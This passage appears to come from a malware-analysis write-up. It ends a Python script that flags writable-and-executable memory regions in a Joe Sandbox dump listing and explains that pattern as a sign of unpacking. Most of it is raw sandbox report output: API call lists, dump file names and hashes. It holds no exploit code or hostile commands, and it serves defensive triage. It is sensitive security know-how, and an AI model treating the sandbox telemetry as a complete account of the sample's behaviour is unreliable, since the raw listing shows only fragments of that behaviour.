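    regions: List[Dict[str, object]] = []
    for line in text.splitlines():
        match = DUMP_NAME_RE.search(line)
        if not match:
            continue
        region = parse_dump_name(match.group(0))
        region["is_source"] = "Source File:" in line
        pe = re.search(r"based on PE:\s*(true|false)", line)
        region["based_on_pe"] = (pe.group(1) == "true") if pe else None  # type: Optional[bool]
        regions.append(region)
    return regions


def writable_executable(regions: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Regions whose base protection allows both writing and executing (W+X)."""
    return [r for r in regions if (int(r["protect"]) & 0xFF) in WRITE_AND_EXEC]


def report(text: str) -> List[str]:
    """Human-readable one-liners for the W+X regions found in a listing."""
    lines = []
    for r in writable_executable(parse_listing(text)):
        tag = "source" if r["is_source"] else "assoc "
        lines.append(f"{tag} base=0x{int(r['base']):08X} {describe_protect(int(r['protect']))}")
    return lines


if __name__ == "__main__":
    for line in report(SAMPLE_LISTING):
        print(line)
```

Running it on the full block above rather than the five-line sample flags 15 of the 17 dumps; only 0x2B0000 and 0x4FA000 are plain PAGE_READWRITE. That pattern, a PE-backed region that is RWX throughout, is the memory-side fingerprint of the unpacking stage the overview reports, and it is a cheap triage check to run on any Joe Sandbox export before spending time in the disassembly.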
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 002B6F74
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B6F7B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID: @
                                  • API String ID: 1357844191-2766056989
                                  • Opcode ID: 1538a907878f6df5fc7a1109ba192fdaf0f50265d857d7727ad2ec9dd321e71f
                                  • Instruction ID: f31477cfdbeb7c57caaeafbeaeaf7a6efb01c0f2a2fac1817a0be3cc8f3a7299
                                  • Opcode Fuzzy Hash: 1538a907878f6df5fc7a1109ba192fdaf0f50265d857d7727ad2ec9dd321e71f
                                  • Instruction Fuzzy Hash: 99218EB06106029BEB20CF20DC88BB673E9EB44745F44487CF946CBA85F7B9E955C750
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D244C
                                  • lstrlen.KERNEL32(00000000), ref: 002D24E9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D2570
                                  • lstrlen.KERNEL32(00000000), ref: 002D2577
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 43dd708a948227c2cd6f3a26bb081ee99104a2e8b216fdc3310245a57ec001ce
                                  • Instruction ID: 1f774753a2d1424ec263a032e921510acef715171c68aa2c4f1b3dfaaa86e84e
                                  • Opcode Fuzzy Hash: 43dd708a948227c2cd6f3a26bb081ee99104a2e8b216fdc3310245a57ec001ce
                                  • Instruction Fuzzy Hash: 3381A471E10306DBDB14DF94DC84BAEB7B9AF94300F2480AAE908A7381E7759D59CF94
                                  APIs
                                    • Part of subcall function 002B1610: lstrcpy.KERNEL32(00000000), ref: 002B162D
                                    • Part of subcall function 002B1610: lstrcpy.KERNEL32(00000000,?), ref: 002B164F
                                    • Part of subcall function 002B1610: lstrcpy.KERNEL32(00000000,?), ref: 002B1671
                                    • Part of subcall function 002B1610: lstrcpy.KERNEL32(00000000,?), ref: 002B1693
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1557
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1579
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B159B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B15FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 8ffb40a288297a8c8a4396f1933432a61d804c171ea62e1f06f1b0f9c7ddd933
                                  • Instruction ID: b08e184c9f78d5176e359fff7d1f5d16e4d049037a3032dc7fc10500e054c301
                                  • Opcode Fuzzy Hash: 8ffb40a288297a8c8a4396f1933432a61d804c171ea62e1f06f1b0f9c7ddd933
                                  • Instruction Fuzzy Hash: D231C374A21B429FD724DF3AC5989A2BBE5BF88340740492DA896C3B50DB30F821CF80
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 002D15A1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D15D9
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D1611
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D1649
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: d48351b77441261e69acb424ce845eb4ab0a23f4729d26215a128e83eac484ef
                                  • Instruction ID: 6cdbd749388c61a394e4a079e069ed8d51b25024bee16264924eb1e421bebc87
                                  • Opcode Fuzzy Hash: d48351b77441261e69acb424ce845eb4ab0a23f4729d26215a128e83eac484ef
                                  • Instruction Fuzzy Hash: CE211874621B039BD724DF2AD454A27B7F8AF44340B14491DA486C7B40DB34EC65CF90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 002B162D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B164F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1671
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1693
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 70304fdbb08cdeda61380d9abe795362636e108e9982b0518cc397d5184b2ba4
                                  • Instruction ID: 40cea6e939b5458ecd1801aad8bb554b966bd4d89cb9ef0f64e830cdb3390c8d
                                  • Opcode Fuzzy Hash: 70304fdbb08cdeda61380d9abe795362636e108e9982b0518cc397d5184b2ba4
                                  • Instruction Fuzzy Hash: 07115E74A21B039BEB249F35D558966B7FCBF44381748452DA89AC7B40EB30E821CF90